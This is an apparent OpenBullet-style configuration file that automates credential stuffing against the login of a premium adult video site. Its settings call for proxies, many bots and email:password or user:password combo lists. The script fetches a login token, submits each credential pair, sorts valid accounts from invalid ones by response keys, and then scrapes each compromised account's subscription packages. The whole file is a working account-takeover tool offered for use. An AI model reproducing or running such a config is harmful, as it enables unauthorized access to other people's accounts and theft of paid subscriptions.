[SETTINGS]
{
  "Name": "PornPortal By^^IpProxeis",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2019-07-15T12:29:51.3811791+01:00",
  "AdditionalInfo": "",
  "Author": "IpProxeis",
  "Version": "1.3.2 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#GET_LOGIN REQUEST GET "https://www.pornhubpremium.com/premium/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Token PARSE "<SOURCE>" LR "token\" value=\"" "\" />" -> VAR "TOKEN" 

#Login REQUEST POST "https://www.pornhubpremium.com/front/authenticate" 
  CONTENT "username=<USER>&password=<PASS>&redirect=&from=pc_premium_login&segment=straight&token=<TOKEN>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#CHECK KEYCHECK 
  KEYCHAIN Success OR 
    KEY "success\":\"1\",\"message\":\"\",\"redirect" 
    KEY "premium_redirect_cookie\":\"1\"" 
  KEYCHAIN Failure OR 
    KEY "success\":\"0\",\"message\":\"Invalid " 
    KEY "premium_redirect_cookie\":\"0\",\"" 

#GET_DATA REQUEST GET "https://www.pornhubpremium.com/postlogin" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#PPTOKEN PARSE "<SOURCE>" LR "var pornportalConfig = {\"data\":\"" "\",\"sid\":\"\"};" -> VAR "PPTOKEN" "" "&network=undefined&domain=undefined&logout=undefined&location=https%3A%2F%2Fwww.pornhubpremium.com%2Fpostlogin" 

#GET_Capture REQUEST GET "https://ppp.contentdef.com/postlogin?data=<PPTOKEN>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Donate_to_me_ PARSE "<SOURCE>" REGEX "name\":\"([^\"]*)\",\"owned\":([^\"]*),\"shortName" "([1]=[2])" Recursive=TRUE -> CAP "Package" 



